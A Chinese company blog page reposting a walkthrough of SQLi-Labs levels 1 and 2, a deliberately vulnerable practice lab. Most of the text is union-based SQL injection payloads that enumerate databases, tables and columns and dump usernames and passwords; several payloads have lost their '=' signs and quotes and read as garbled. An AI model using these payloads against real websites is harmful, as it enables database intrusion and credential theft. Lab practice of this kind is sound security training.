尧图网络科技YAOTU DIGITAL 获取报价
获取报价
首页 / 资讯中心 / 文章详情

全网最详细sqllab1-2关解析

发布时间:2026/9/27 2:09:43

资讯中心
01
ARTICLE

全网最详细sqllab1-2关解析

全网最详细sqllab1-2关解析
关卡1思路提示get传参id尝试id1正确返回用户名密码尝试ida无回显确认为字符型尝试id1--,正常回显,可自主闭合id1 order by 4-- 不可以order by 3可以确认行数只回显示2个根据id-1union select 1,2,3--确认23位置返回根据information_schema库下逐层查库查表查字段攻击代码查库?id-1union select 1,2,group_concat(schema_name) from information_schema.schemata--查表id-1%27union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schemasecurity--查字段?id-1%27union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_schemasecurityand%20table_nameusers--根据字段获取数据?id-1%27%20union%20select%201,password,username%20from%20users%20where%20id3--查所有密码?id-1%27union%20select%201,2,group_concat(password)%20from%20users--关卡2思路提示get传参id尝试id1正确返回用户名密码尝试ida无此列确认为数字型尝试id1--,正常回显,可自主闭合id1 order by 4-- 不可以order by 3可以确认行数只回显示2个根据id-1union select 1,2,3--确认23位置返回根据information_schema库下逐层查库查表查字段攻击代码查库-1%20union select 1,2,group_concat(schema_name) from information_schema.schemata--查表id-1%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schemasecurity--查字段?id-1%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_schemasecurityand%20table_nameusers--根据字段获取数据?id-1%20union%20select%201,password,username%20from%20users%20where%20id3--查所有密码?id-1%20union%20select%201,2,group_concat(password)%20from%20users--
02
RELATED NEWS

相关资讯

更多网站建设与数字化升级内容

03
WHY YAOTU

想打造同款高转化官网?

懂行业、懂生意,从建站到增长一站式陪跑

◈

场景化定制

不做模板站,围绕你的业务场景量身设计,小众不撞款。

◐

营销型架构

以转化目标组织内容与路径,让官网真正带来询盘。

▲

全周期服务

设计、开发、运营、运维一体,上线只是开始。

免费获取你的建站方案

留下需求,专属顾问 24 小时内为你输出方案建议。